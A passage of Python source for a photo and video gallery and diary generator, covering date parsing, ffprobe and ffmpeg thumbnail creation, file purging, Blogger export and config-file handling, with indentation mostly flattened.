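#   date_from_name('IMG_20200714_101010.jpg') -> '20200714'
#   date_from_name('holiday-video.mp4') -> None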
def date_from_item(filename):
if date := date_from_name(filename):
return date
else:
timestamp = os.path.getmtime(filename)
return datetime.datetime.fromtimestamp(timestamp).strftime('%Y%m%d')
def time_from_name(name):
# heuristics
if match := re.search(r'(?:\D|^)(\d{8})\D(\d{6})(?:\D|$)', name, re.ASCII):
digits = match.group(2)
hour, minute, second = int(digits[0:2]), int(digits[2:4]), int(digits[4:6])
if 0 <= hour < 24 and 0 <= minute < 60 and 0 <= second < 60:
return digits
return None
def time_from_item(filename):
if time := time_from_name(filename):
return time
else:
timestamp = os.path.getmtime(filename)
return datetime.datetime.fromtimestamp(timestamp).strftime('%H%M%S')
FFPROBE_CMD = '''\
ffprobe -v error
-select_streams v:0
-show_entries stream=width,height,avg_frame_rate,r_frame_rate:format=duration
-of csv=p=0
'''
def get_image_info(filename):
date = date_from_item(filename)
time = time_from_item(filename)
img = Image.open(filename)
width, height = img.size
size = round(os.path.getsize(filename) / 1e6, 1)
return (date, time, width, height, size), f'{date} {time}, dim={width}x{height}, {size} MB'
def get_video_info(filename, info_fullname):
if os.path.exists(info_fullname):
with open(info_fullname) as f:
info = f.readline().split()
date, time, width, height, size, duration, fps = info[0], info[1], int(info[2]), int(info[3]), float(info[4]), int(info[5]), float(info[6])
formatted_info = format_video_info(date, time, width, height, size, duration, fps)
return (date, time, width, height, size, duration, fps), formatted_info
else:
info, formatted_info = make_video_info(filename, info_fullname)
with open(info_fullname, 'wt') as f:
print(' '.join([str(_) for _ in info]), file=f)
return info, formatted_info
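# The cached .info file written above holds a single space-separated line with
# the same fields, e.g. (illustrative values):
#   20200714 101010 1920 1080 85.3 734 30.0
#   (date    time   width height MB  s  fps)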
def make_video_info(filename, info_fullname):
# ffmpeg must be in path
date = date_from_item(filename)
time = time_from_item(filename)
command = [*FFPROBE_CMD.split(), filename]
try:
output = check_output(command, stderr=STDOUT).decode()
width, height, fps, duration = parse_ffprobe_output(output)
size = round(os.path.getsize(filename) / 1e6, 1)
output = format_video_info(date, time, width, height, size, duration, fps)
except CalledProcessError as e:
output = e.output.decode()
warning(output)
raise
return (date, time, width, height, size, duration, fps), output
def parse_ffprobe_output(ffprobe_output):
# parse first channel data and last line for duration
match = re.match(r'(\d+),(\d+),(\d+)/(\d+),(\d+/\d+).*\s(\d+\.\d+)', ffprobe_output, re.DOTALL)
width = int(match.group(1))
height = int(match.group(2))
fps = round(int(match.group(3)) / int(match.group(4)), 1)
duration = round(float(match.group(6)))
return width, height, fps, duration
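# With FFPROBE_CMD above, the output parsed here typically looks like
# (illustrative values):
#   1920,1080,30000/1001,30000/1001
#   734.066000
# which yields width=1920, height=1080, fps=30.0 and duration=734.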
def format_video_info(date, time, width, height, size, duration, fps):
return f'{date} {time}, dim={width}x{height}, {format_duration(duration)}, fps={fps}, {size} MB'
def format_duration(duration):
mn = duration // 60
sec = duration % 60
if mn <= 59:
return f'm:s={mn:02}:{sec:02}'
else:
hour = mn // 60
mn = mn % 60
return f'h:m:s={hour:02}:{mn:02}:{sec:02}'
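# For illustration: format_duration(75) -> 'm:s=01:15' and
# format_duration(3675) -> 'h:m:s=01:01:15'.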
# -- Thumbnails (image and video) ---------------------------------------------
def thumbname(name, key):
return key + '-' + name + '.jpg'
def size_thumbnail(width, height, maxdim):
if width >= height:
return maxdim, int(round(maxdim * height / width))
else:
return int(round(maxdim * width / height)), maxdim
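# For illustration: size_thumbnail(4000, 3000, 300) -> (300, 225) and
# size_thumbnail(3000, 4000, 300) -> (225, 300).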
def make_thumbnail_image(args, image_name, thumb_name, size):
if os.path.exists(thumb_name) and args.forcethumb is False:
pass
else:
print('Making thumbnail:', thumb_name)
create_thumbnail_image(image_name, thumb_name, size)
def create_thumbnail_image(image_name, thumb_name, size):
imgobj = Image.open(image_name)
if (imgobj.mode != 'RGBA'
and image_name.endswith('.jpg')
and not (image_name.endswith('.gif') and imgobj.info.get('transparency'))
):
imgobj = imgobj.convert('RGBA')
imgobj.thumbnail(size, Image.LANCZOS)
imgobj = imgobj.convert('RGB')
imgobj.save(thumb_name)
def make_thumbnail_video(args, video_name, thumb_name, size, duration):
if os.path.exists(thumb_name) and args.forcethumb is False:
pass
else:
print('Making thumbnail:', thumb_name)
create_thumbnail_video(args, video_name, thumb_name, size, duration)
# base64 video.png
VIDEO_ICON = '''\
iVBORw0KGgoAAAANSUhEUgAAABgAAAAUCAAAAACy3qJfAAAA4UlEQVR4
2m1QoRbCMAy88SaK69xscfuEWiS4SZBIcCCRfAL8An8AcnJzTOJSWdxwzJXSPUoHRPQlueYuucigxm
9kDGaMf8AjopGcYn8LmmyLoihBWBiThb+5MTuUsc3aL56upneZ9sByAIg8Z8BEn96EeZ65iU7DvmbP
PxqDcH6p1swXBC4l6yZskACkTN1WrQr2SlIFhTtgqeZa+zsOogLXegvEocZ5c/W5BcoVNNCg3hSudV
/hEh4ofw6cEb00Km8i0dpRDUXfKiaQOEAdrUDo4dFp9C33jjaRac9/gDF/AlplVYtfWGCjAAAAAElF
TkSuQmCC'''
def create_thumbnail_video(args, filename, thumbname, size, duration):
# ffmpeg must be in path
delay = min(duration - 1, args.thumbnails.thumbdelay)
sizearg = '%dx%d' % size
command = 'ffmpeg -y -v error -itsoffset -%d -i "%s" -vcodec mjpeg -vframes 1 -an -f rawvideo -s %s "%s"'
command = command % (delay, filename, sizearg, thumbname)
result = os.system(command)
# add a movie icon to the thumbnail to identify videos
try:
img1 = Image.open(thumbname)
except:
# ffmpeg was unable to save thumbnail
warning('Unable to save thumbnail for', filename)
return
img2 = Image.open(io.BytesIO(base64.b64decode(VIDEO_ICON)))
width, height = img1.size
img1.paste(img2, (6, height - 20 - 6), None)
img1.save(thumbname)
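# Assuming a 60 s clip, a 300x225 thumbnail and a thumbdelay setting of 5, the
# command built above would look like (file names invented for illustration):
#   ffmpeg -y -v error -itsoffset -5 -i "video.mp4" -vcodec mjpeg -vframes 1 -an -f rawvideo -s 300x225 "thumb.jpg"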
def make_thumbnail_subdir(args, subdir_name, thumb_name, size, items, thumbdir):
# subdir thumbnails are always created as they depend on the content of the
# directory
print('Making thumbnail:', thumb_name)
create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir)
def create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir):
def size_thumbnail(width, height, xmax, ymax):
width2 = xmax
height2 = int(round(xmax * height / width))
if height2 < ymax:
width2 = int(round(ymax * width / height))
height2 = ymax
return width2, height2
thumblist = [os.path.basename(item.thumb) for item in items]
widthnum, heightnum, width, height, offsetx, offsety = mosaic_geometry(size, thumblist)
thumbnum = widthnum * heightnum
img = Image.new('RGB', size, SUBDIR_BACKCOL)
for ind, thumb in enumerate(thumblist[:min(thumbnum, len(thumblist))]):
row = ind // widthnum
col = ind % widthnum
img2 = Image.open(os.path.join(thumbdir, thumb))
w, h = size_thumbnail(*img2.size, width[col], height[row])
cropdim = ((w - width[col]) // 2, (h - height[row]) // 2,
(w - width[col]) // 2 + width[col], (h - height[row]) // 2 + height[row])
img2 = img2.resize((w, h), Image.LANCZOS)
img2 = img2.crop(cropdim)
img.paste(img2, (offsetx[col], offsety[row]))
if os.path.exists(thumb_name):
# test if the generated thumbnail is identical to the one already on disk
imgref = Image.open(thumb_name)
# must save and reload before comparing
byteio = io.BytesIO()
img.save(byteio, "JPEG")
byteio.seek(0)
imgnew = Image.open(byteio)
diff = ImageChops.difference(imgnew, imgref)
if diff.getbbox() is None:
return
img.save(thumb_name)
def mosaic_geometry(size, thumblist):
if len(thumblist) == 1:
widthnum = 1
heightnum = 1
elif len(thumblist) <= 3:
widthnum = 1
heightnum = 2
elif len(thumblist) <= 8:
widthnum = 2
heightnum = 2
else:
widthnum = 3
heightnum = 3
if widthnum == 1:
width = [size[0] - 2]
else:
width = [size[0] // widthnum - 2] * (widthnum - 1)
width.append(size[0] - (1 + sum(width) + 2 * len(width) + 1))
if heightnum == 1:
height = [size[1] - 2]
else:
height = [size[1] // heightnum - 2] * (heightnum - 1)
height.append(size[1] - (1 + sum(height) + 2 * len(height) + 1))
offsetx = [1]
for w in width[:-1]:
offsetx.append(offsetx[-1] + w + 2)
offsety = [1]
for h in height[:-1]:
offsety.append(offsety[-1] + h + 2)
return widthnum, heightnum, width, height, offsetx, offsety
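# A quick worked example: with size=(300, 225) and 5 thumbnails the mosaic is
# a 2x2 grid with width=[148, 148], height=[110, 111], offsetx=[1, 151] and
# offsety=[1, 113], i.e. a 1-pixel outer margin and 2-pixel gutters.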
def list_of_htmlfiles(args, posts):
htmlist = list()
htmlist.append(os.path.join(args.dest, args.rootname))
for post in posts:
htmlist.extend(list_of_htmlfiles_in_items(post.dcim))
return htmlist
def list_of_htmlfiles_in_items(itemlist):
htmlist = list()
for item in itemlist:
if type(item) == PostSubdir:
htmlist.append(item.htmname)
htmlist.extend(list_of_htmlfiles_in_items(item.sublist))
return htmlist
def list_of_thumbnails(posts, diary=False):
thumblist = list()
for post in posts:
thumblist.extend(list_of_thumbnails_in_items(post.medias))
if diary is False:
thumblist.extend(list_of_thumbnails_in_items(post.dcim))
return thumblist
def list_of_thumbnails_in_items(itemlist):
thumblist = list()
for item in itemlist:
if type(item) == PostSubdir:
thumblist.append(os.path.basename(item.thumb))
thumblist.extend(list_of_thumbnails_in_items(item.sublist))
else:
thumblist.append(os.path.basename(item.thumb))
return thumblist
def purge_htmlfiles(args, posts):
"""
    Purge the root dir of irrelevant html files
"""
htmlist = list_of_htmlfiles(args, posts)
html_to_remove = list()
for fullname in glob.glob(os.path.join(args.root, '*.htm*')):
if fullname not in htmlist:
html_to_remove.append(fullname)
if len(html_to_remove) > args.thumbnails.threshold_htmlfiles:
inpt = 'x'
while inpt not in 'yn':
inpt = input(f'{len(html_to_remove)} html files to remove. Continue [y|n]? ').lower()
if inpt == 'n':
return
for name in html_to_remove:
print('Removing html files', name)
os.remove(name)
def purge_thumbnails(args, thumbdir, posts, diary=False):
"""
    Purge the thumbnail dir of irrelevant thumbnails
"""
thumblist = list_of_thumbnails(posts, diary)
thumbs_to_remove = list()
for fullname in glob.glob(os.path.join(thumbdir, '*.jpg')):
if os.path.basename(fullname) not in thumblist:
thumbs_to_remove.append(fullname)
if len(thumbs_to_remove) > args.thumbnails.threshold_thumbs:
inpt = 'x'
while inpt not in 'yn':
inpt = input(f'{len(thumbs_to_remove)} thumbnails to remove. Continue [y|n]? ').lower()
if inpt == 'n':
return
for name in thumbs_to_remove:
print('Removing thumbnail', name)
os.remove(name)
info_fullname = os.path.splitext(name)[0] + '.info'
if os.path.exists(info_fullname):
os.remove(info_fullname)
# -- List of medias helpers ---------------------------------------------------
def is_media_within_dates(fullname, dates):
if is_media(fullname):
if type(dates) == tuple:
return dates[0] <= date_from_item(fullname) <= dates[1]
else:
return True
else:
return False
def sorted_listdir(filelist):
like_windows_explorer = True
if not filelist:
return filelist
if like_windows_explorer:
maxlen = max(len(os.path.splitext(name)[0]) for name in filelist)
def keyfunc(name):
root, ext = os.path.splitext(name.lower())
return root.ljust(maxlen, ' ') + ext
else:
keyfunc = str.lower
return sorted(filelist, key=keyfunc)
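# For illustration: with this padded key, 'abc.jpg' sorts before 'abc-1.jpg',
# whereas plain case-insensitive ordering would put 'abc-1.jpg' first.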
def list_of_files(sourcedir, recursive):
"""
Return the list of full paths for files in source directory
"""
result = list()
if recursive is False:
listdir = sorted_listdir(os.listdir(sourcedir))
if '.nomedia' not in listdir:
for basename in listdir:
result.append(os.path.join(sourcedir, basename))
else:
for root, dirs, files in os.walk(sourcedir):
if '.nomedia' not in files:
for basename in sorted_listdir(files):
result.append(os.path.join(root, basename))
return result
def list_of_medias(args, sourcedir, recursive):
"""
Return the list of full paths for pictures and movies in source directory
"""
files = list_of_files(sourcedir, recursive)
return [_ for _ in files if is_media_within_dates(_, args.dates)]
def list_of_medias_ext(args, sourcedir):
"""
Return the list of full paths for pictures and movies in source directory
plus subdirectories containing media
"""
result = list()
listdir = sorted_listdir(os.listdir(sourcedir))
if '.nomedia' not in listdir:
for basename in listdir:
fullname = os.path.join(sourcedir, basename)
if os.path.isdir(fullname) and basename != '$RECYCLE.BIN' and contains_media(args, fullname):
result.append(fullname)
else:
if is_media_within_dates(fullname, args.dates):
result.append(fullname)
return result
def contains_media(args, dirname):
for root, dirs, files in os.walk(dirname):
if '.nomedia' not in files:
for basename in files:
if is_media_within_dates(os.path.join(root, basename), args.dates):
return True
else:
return False
def dispatch_post_items(list_of_post_items):
subdirs = [_ for _ in list_of_post_items if type(_) is PostSubdir]
medias = [_ for _ in list_of_post_items if type(_) is not PostSubdir]
return subdirs, medias
# -- Creation of gallery element ----------------------------------------------
def create_item(args, media_fullname, sourcedir, thumbdir, key, thumbmax):
if os.path.isfile(media_fullname):
if is_image_file(media_fullname):
return create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax)
else:
return create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax)
else:
return create_item_subdir(args, media_fullname, sourcedir, thumbdir, key, thumbmax)
def create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax):
media_basename = os.path.basename(media_fullname)
media_relname = relative_name(media_fullname, sourcedir)
thumb_basename = thumbname(media_relname, key)
thumb_fullname = os.path.join(thumbdir, thumb_basename)
try:
info, infofmt = get_image_info(media_fullname)
infofmt = media_basename + ': ' + infofmt
thumbsize = size_thumbnail(info[2], info[3], thumbmax)
make_thumbnail_image(args, media_fullname, thumb_fullname, thumbsize)
return PostImage(None, media_fullname, '/'.join((args.thumbrep, thumb_basename)),
thumbsize, infofmt)
except PIL.UnidentifiedImageError:
# corrupted image
warning('Unable to read image', media_fullname)
return None
def create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax):
media_basename = os.path.basename(media_fullname)
media_relname = relative_name(media_fullname, sourcedir)
thumb_basename = thumbname(media_relname, key)
thumb_fullname = os.path.join(thumbdir, thumb_basename)
info_fullname = os.path.splitext(thumb_fullname)[0] + '.info'
try:
info, infofmt = get_video_info(media_fullname, info_fullname)
infofmt = media_basename + ': ' + infofmt
thumbsize = size_thumbnail(info[2], info[3], thumbmax)
make_thumbnail_video(args, media_fullname, thumb_fullname, thumbsize, duration=info[5])
return PostVideo(None, media_fullname, '/'.join((args.thumbrep, thumb_basename)),
thumbsize, infofmt)
except CalledProcessError:
# corrupted video
warning('Unable to read video', media_fullname)
return None
def create_item_subdir(args, media_fullname, sourcedir, thumbdir, key, thumbmax):
media_basename = os.path.basename(media_fullname)
media_relname = relative_name(media_fullname, sourcedir)
thumb_basename = thumbname(media_relname, key)
thumb_fullname = os.path.join(thumbdir, thumb_basename)
info, infofmt = None, None
thumbsize = (thumbmax, int(round(thumbmax / 640 * 480)))
medias_ext = list_of_medias_ext(args, media_fullname)
if not medias_ext:
return None
item = PostSubdir(None, media_fullname, '/'.join((args.thumbrep, thumb_basename)),
thumbsize, infofmt)
item.htmname = os.path.join(os.path.dirname(thumbdir), media_relname + args.html_suffix)
if args.thumbnails.subdir_caption:
item.caption = media_basename
else:
item.caption = ''
_, posts = make_posts(args, media_fullname)
item.posts = posts
items = [item for post in posts for item in post.dcim]
item.sublist = items
make_thumbnail_subdir(args, media_fullname, thumb_fullname, thumbsize, items, thumbdir)
return item
def relative_name(media_fullname, sourcedir):
"""
/Gilles/Dev/journal/tests/subdir/deeper2/deepest/OCT_20000112_000004.jpg
-->
deeper2_deepest_OCT_20000112_000004.jpg
/Gilles/Dev/journal/tests/subdir/deeper2/deepest
-->
deeper2_deepest
"""
x = os.path.relpath(media_fullname, sourcedir)
x = x.replace('\\', '_').replace('/', '_').replace('#', '_')
return x
# -- Creation of posts --------------------------------------------------------
def make_posts(args, dirname):
if args.diary is True:
if not args.sourcedir:
return make_posts_from_diary(args)
else:
return make_posts_from_diary_and_dir(args)
elif args.bydate is False:
return make_posts_from_subdir(args, dirname)
else:
return make_posts_from_subdir_and_date(args, dirname)
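# Summary of the dispatch above:
#   --diary true, no --sourcedir   -> posts built from index.md only
#   --diary true, with --sourcedir -> index.md posts completed with dated media
#   --bydate false                 -> a single undated post with all media
#   --bydate true                  -> one post per date found in the media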
def make_posts_from_diary(args):
md_filename = os.path.join(args.root, 'index.md')
if os.path.exists(md_filename):
title, posts = parse_markdown(md_filename)
else:
error('File not found', md_filename)
for post in posts:
for media in post.medias:
media_fullname = os.path.join(args.root, media.uri)
item = create_item(args, media_fullname, args.root, args.thumbdir, 'post', 400)
media.thumb = item.thumb
media.thumbsize = item.thumbsize
media.descr = item.descr
return title, posts
def create_items_by_date(args, medias, posts):
# list of required dates
if args.dates == 'diary':
required_dates = {post.date for post in posts}
else:
required_dates = {date_from_item(media) for media in medias}
if type(args.dates) == tuple:
date1, date2 = args.dates
required_dates = {date for date in required_dates if date1 <= date <= date2}
bydate = defaultdict(list)
for media_fullname in medias:
date = date_from_item(media_fullname)
if date in required_dates:
item = create_item(args, media_fullname, args.sourcedir, args.thumbdir, 'dcim', 300)
if item:
bydate[date].append(item)
for date, liste in bydate.items():
liste.sort(key=lambda item: time_from_item(item.uri))
return bydate
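# The returned value maps a 'YYYYMMDD' string to the items of that day, each list
# sorted by the time taken from the media file name (or mtime), e.g.
# {'20200412': [<PostImage>, <PostVideo>, ...]}.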
def make_posts_from_diary_and_dir(args):
title, posts = make_posts_from_diary(args)
# list of all pictures and movies
medias = list_of_medias(args, args.sourcedir, args.recursive)
bydate = create_items_by_date(args, medias, posts)
# make list of extra dates (not in posts)
extradates = set(bydate) - {post.date for post in posts}
# complete posts with extra dates
for date in extradates:
post = Post.from_date(date)
post.extra = True
bisect.insort(posts, post)
# several posts can have the same date, only the first one is completed with dcim medias
for post in posts:
if post.date in bydate and post.daterank == 1:
post.dcim = bydate[post.date]
return title, posts
def make_posts_from_subdir(args, dirname):
# list of pictures and movies plus subdirectories
if args.bydir is False:
medias_ext = list_of_medias(args, dirname, args.recursive)
else:
medias_ext = list_of_medias_ext(args, dirname)
#required_dates = get_required_dates(args, medias_ext, posts=None)
#medias_ext_bis = []
#for media in medias_ext:
# if complies_with_required_dates(media):
# medias_ext_bis.append(media)
# complete posts
postmedias = list()
for item in medias_ext:
postmedia = create_item(args, item, args.sourcedir, args.thumbdir, 'dcim', 300)
if postmedia is not None:
postmedias.append(postmedia)
post = Post(date='00000000', text='', medias=[])
post.dcim = postmedias
posts = [post]
title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.sourcedir)[0]
return title, posts
def make_posts_from_subdir_and_date(args, dirname):
# list of all pictures and movies
if args.bydir is False:
medias = list_of_medias(args, dirname, args.recursive)
subdirs = []
else:
medias_ext = list_of_medias_ext(args, dirname)
medias = [_ for _ in medias_ext if is_media(_)]
subdirs = [_ for _ in medias_ext if not is_media(_)]
# create list of posts with a single post containing all subdirs
posts = list()
items = list()
for media_fullname in subdirs:
item = create_item(args, media_fullname, args.sourcedir, args.thumbdir, 'dcim', 300)
if item:
items.append(item)
if items:
post = Post(date='00000000', text='', medias=[])
post.dcim = items
posts.append(post)
bydate = create_items_by_date(args, medias, posts)
# add dates
for date in sorted(bydate):
post = Post.from_date(date)
post.dcim = bydate[post.date]
posts.append(post)
title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.sourcedir)[0]
return title, posts
# -- Creation of html page from directory tree --------------------------------
def create_gallery(args):
title, posts = make_posts(args, args.sourcedir)
print_html(args, posts, title, os.path.join(args.dest, args.rootname), 'regular')
purge_htmlfiles(args, posts)
if args.diary and not args.sourcedir:
purge_thumbnails(args, args.thumbdir, posts, diary=True)
else:
purge_thumbnails(args, args.thumbdir, posts)
# -- Creation of diary from medias --------------------------------------------
def create_diary(args):
# list of all pictures and movies
medias = list_of_medias(args, args.sourcedir, args.recursive)
# list of required dates
if args.dates == 'diary':
assert 0
else:
required_dates = {date_from_item(media) for media in medias}
if type(args.dates) == tuple:
date1, date2 = args.dates
required_dates = {date for date in required_dates if date1 <= date <= date2}
title = args.sourcedir
posts = list()
for date in sorted(required_dates):
posts.append(Post.from_date(date))
os.makedirs(args.root, exist_ok=True)
print_markdown(posts, title, os.path.join(args.root, 'index.md'))
# -- Export to blogger---------------------------------------------------------
def online_images_url(args):
try:
if args.urlblogger.startswith('http:') or args.urlblogger.startswith('https:'):
with urlopen(args.urlblogger) as u:
buffer = u.read()
else:
with open(args.urlblogger, 'rb') as f:
buffer = f.read()
except:
error('Unable to read url', args.urlblogger)
buffer = buffer.decode('utf-8')
online_images = dict()
for match in re.finditer('<div class="separator"((?!<div).)*?</div>', buffer, flags=re.DOTALL):
div_separator = match.group(0)
div_separator = div_separator.replace(' ', '')
elem_div = objectify.fromstring(div_separator)
for elem_a in elem_div.iterchildren(tag='a'):
href = elem_a.get("href")
thumb = elem_a.img.get("src")
online_images[os.path.basename(href)] = (href, thumb)
# video insertion relies only on video order
online_videos = list()
for match in re.finditer('<iframe allowfullscreen="allowfullscreen".*?</iframe>', buffer, flags=re.DOTALL):
iframe = match.group(0)
online_videos.append(iframe)
return online_images, online_videos
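# The returned dict maps an image basename to its (full-size url, thumbnail url)
# pair scraped from the blogger page; the iframe snippets are returned as a plain
# list because videos are matched purely by order (see compose_blogger_html).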
def compare_image_buffers(imgbuf1, imgbuf2):
"""
return True if images read on file are identical, False otherwise
"""
with io.BytesIO(imgbuf1) as imgio1, io.BytesIO(imgbuf2) as imgio2:
img1 = Image.open(imgio1)
img2 = Image.open(imgio2)
diff = ImageChops.difference(img1, img2)
return not diff.getbbox()
def check_images(args, posts, online_images):
result = True
for post in posts:
for media in post.medias:
if type(media) is PostImage:
if media.basename in online_images:
with open(os.path.join(args.root, media.uri), 'rb') as f:
imgbuf1 = f.read()
try:
with urlopen(online_images[media.basename][0]) as u:
imgbuf2 = u.read()
except FileNotFoundError:
print('File not found', online_images[media.basename][0])
                        continue
if compare_image_buffers(imgbuf1, imgbuf2) is False:
print('Files are different, upload', media.basename)
                    else:
                        print('File already online', media.basename)
else:
print('File is absent, upload', media.basename)
result = False
elif type(media) is PostVideo:
# no check for the moment
print('Video not checked', media.basename)
else:
assert False
return result
def compose_blogger_html(args, title, posts, imgdata, online_videos):
""" Compose html with blogger image urls
"""
for post in posts:
for media in post.medias:
if type(media) is PostImage:
if media.uri not in imgdata:
print('Image missing: ', media.uri)
else:
img_url, resized_url = imgdata[media.uri]
media.uri = img_url
media.resized_url = resized_url
elif type(media) is PostVideo:
if not online_videos:
print('Video missing: ', media.uri)
else:
media.iframe = online_videos[0]
del online_videos[0]
else:
assert False
return print_html(args, posts, title, '', target='blogger')
def prepare_for_blogger(args):
"""
Export blogger html to clipboard.
If --full, export complete html, otherwise export html extract ready to
paste into blogger edit mode.
"""
title, posts = parse_markdown(os.path.join(args.root, 'index.md'))
online_images, online_videos = online_images_url(args)
if args.check_images and check_images(args, posts, online_images) is False:
pass
html = compose_blogger_html(args, title, posts, online_images, online_videos)
if args.full is False:
html = re.search('<body>(.*)?</body>', html, flags=re.DOTALL).group(1)
html = re.sub('<script>.*?</script>', '', html, flags=re.DOTALL)
html = STYLE.replace('%%', '%') + html
if args.dest:
with open(args.dest, 'wt', encoding='utf-8') as f:
f.write(html)
else:
clipboard.copy(html)
# -- Other commands -----------------------------------------------------------
def idempotence(args):
"""
    For testing identity between a diary file and the file obtained after reading
and printing it. See testing.
"""
title, posts = parse_markdown(os.path.join(args.root, 'index.md'))
print_markdown(posts, title, os.path.join(args.dest, 'index.md'))
# -- Configuration file ------------------------------------------------------
# The following docstring is used to create the configuration file.
CONFIG_DEFAULTS = """\
[source]
; source directory
; value: valid path
sourcedir = .
; one web page per directory
; value: true or false
bydir = false
; dispatch medias by dates
; value: true or false
bydate = false
; include text and medias from diary file
; value: true or false
diary = false
; include subdirectories recursively (used when bydir is false)
; value: true or false
recursive = false
; interval of dates to include
; value: source|diary|yyyymmdd-yyyymmdd or empty (= source)
dates =
; github Pages compatibility (.html extension and no dot in directory names)
; value: true or false
github_pages = false
[thumbnails]
; specifies whether or not the gallery displays media description (size, dimension, etc)
; value: true or false
media_description = true
; specifies whether subdir captions are empty or the name of the subdir
; value: true or false
subdir_caption = true
; timestamp of thumbnail in video
; value: number of seconds
thumbdelay = 5
; maximum number of thumbnails to remove without user confirmation
; value: integer
threshold_thumbs = 10
[photobox]
; Allows to navigate between first and last images
; value: true or false
loop = false
; Show gallery thumbnails below the presented photo
; value: true or false
thumbs = true
; Should autoplay on first time or not
; value: true or false
autoplay = false
; Autoplay interval (less than 1000 will hide the autoplay button)
; value: milliseconds
time = 3000
; Disable/enable mousewheel image zooming
; value: true or false
zoomable = true
; Allow rotation of the image
; value: true or false
rotatable = true
; Change image using mousewheel left/right
; value: true or false
wheelNextPrev = true
"""
class MyConfigParser(ConfigParser):
"""Add input checking."""
def __init__(self):
ConfigParser.__init__(self, inline_comment_prefixes=(';',))
def error(self, section, entry):
error('Missing or incorrect config value:', '[%s]%s' % (section, entry))
def getint(self, section, entry, default=None):
try:
if default is None:
return ConfigParser.getint(self, section, entry)
else:
return ConfigParser.getint(self, section, entry, raw=True, vars=None, fallback=default)
except Exception as e:
print(e)
self.error(section, entry)
def getboolean(self, section, entry, default=None):
try:
if default is None:
return ConfigParser.getboolean(self, section, entry)
else:
return ConfigParser.getboolean(self, section, entry, raw=True, vars=None, fallback=default)
except Exception as e:
print(e)
self.error(section, entry)
def configfilename(params):
return os.path.join(params.root, '.config.ini')
def createconfig(config_filename):
with open(config_filename, 'wt') as f:
f.writelines(CONFIG_DEFAULTS)
def read_config(params):
config_filename = configfilename(params)
try:
if not os.path.exists(config_filename) or params.resetcfg:
createconfig(config_filename)
except:
error('Error creating configuration file')
try:
getconfig(params, config_filename)
except Exception as e:
error('Error reading configuration file.', str(e), 'Use --resetcfg')
def getconfig(options, config_filename):
class Section:
pass
options.source = Section()
options.thumbnails = Section()
options.photobox = Section()
config = MyConfigParser()
config.read(config_filename)
# [source]
options.source.sourcedir = config.get('source', 'sourcedir')
options.source.bydir = config.getboolean('source', 'bydir')
options.source.bydate = config.getboolean('source', 'bydate')
options.source.diary = config.getboolean('source', 'diary')
options.source.recursive = config.getboolean('source', 'recursive')
options.source.dates = config.get('source', 'dates')
options.source.github_pages = config.getboolean('source', 'github_pages', default=False)
# [thumbnails]
options.thumbnails.media_description = config.getboolean('thumbnails', 'media_description')
options.thumbnails.subdir_caption = config.getboolean('thumbnails', 'subdir_caption')
options.thumbnails.thumbdelay = config.getint('thumbnails', 'thumbdelay')
options.thumbnails.threshold_thumbs = config.getint('thumbnails', 'threshold_thumbs')
options.thumbnails.threshold_htmlfiles = config.getint('thumbnails', 'threshold_htmlfiles', default=3)
# [photobox]
options.photobox.loop = config.getboolean('photobox', 'loop')
options.photobox.thumbs = config.getboolean('photobox', 'thumbs')
options.photobox.autoplay = config.getboolean('photobox', 'autoplay')
options.photobox.time = config.getint('photobox', 'time')
options.photobox.zoomable = config.getboolean('photobox', 'zoomable')
options.photobox.rotatable = config.getboolean('photobox', 'rotatable')
options.photobox.wheelNextPrev = config.getboolean('photobox', 'wheelNextPrev')
def setconfig(cfgname, section, key, value):
config = MyConfigParser()
config.read(cfgname)
config.set(section, key, value)
with open(cfgname, 'wt') as configfile:
config.write(configfile)
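# For illustration: setconfig('.config.ini', 'source', 'bydate', 'true') rewrites a
# single entry, but ConfigParser.write() drops the comments of the file; this is
# why update_config() below patches the config file line by line instead.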
def setconfig_cmd(args):
config_filename = configfilename(args)
setconfig(config_filename, *args.setcfg)
def update_config(args):
# update only entries which can be modified from the command line (source section)
updates = (
('sourcedir', args.sourcedir),
('bydir', BOOL[args.bydir]),
('bydate', BOOL[args.bydate]),
('diary', BOOL[args.diary]),
('recursive', BOOL[args.recursive]),
('dates', args.dates),
('github_pages', BOOL[args.github_pages]),
)
# manual update to keep comments
cfgname = configfilename(args)
with open(cfgname) as f:
cfglines = [_.strip() for _ in f.readlines()]
for key, value in updates:
for iline, line in enumerate(cfglines):
if line.startswith(key):
cfglines[iline] = f'{key} = {value}'
break
with open(cfgname, 'wt') as f:
for line in cfglines:
print(line, file=f)
# -- Error handling -----------------------------------------------------------
def warning(*msg):
print(colorama.Fore.YELLOW + colorama.Style.BRIGHT +
' '.join(msg),
colorama.Style.RESET_ALL)
# Every error message must be declared here to give a return code to the error
ERRORS = '''\
File not found
Directory not found
No date in post
Incorrect date value:
Posts are not ordered
Unable to read url
No image source (--sourcedir)
No blogger url (--url)
Missing or incorrect config value:
Error creating configuration file
Error reading configuration file.
Incorrect date format
Incorrect parameters:
'''
def errorcode(msg):
return ERRORS.splitlines().index(msg) + 1
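# For illustration: error('File not found', 'index.md') prints in red and exits
# with status 1 because 'File not found' is the first line of ERRORS; errorcode()
# returns the 1-based position of the message in that list.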
def error(*msg):
print(colorama.Fore.RED + colorama.Style.BRIGHT +
' '.join(msg),
colorama.Style.RESET_ALL)
sys.exit(errorcode(msg[0]))
# -- Main ---------------------------------------------------------------------
BOOL = ('false', 'true')
def parse_command_line(argstring):
parser = argparse.ArgumentParser(description=None, usage=USAGE)
agroup = parser.add_argument_group('Commands')
xgroup = agroup.add_mutually_exclusive_group()
xgroup.add_argument('--gallery', help='source in --sourcedir',
action='store', metavar='<root-dir>')
agroup.add_argument('--update', help='updates gallery with parameters in config file',
action='store', metavar='<root-dir>')
xgroup.add_argument('--create', help='create journal from medias in --sourcedir',
action='store', metavar='<root-dir>')
# testing
xgroup.add_argument('--resetcfg', help='reset config file to defaults',
action='store', metavar='<root-dir>')
xgroup.add_argument('--setcfg', help=argparse.SUPPRESS,
action='store', nargs=4, metavar='<root-dir>')
xgroup.add_argument('--idem', help=argparse.SUPPRESS,
action='store', metavar='<root-dir>')
# blogger
xgroup.add_argument('--blogger',
help='input md, html blogger ready in clipboard',
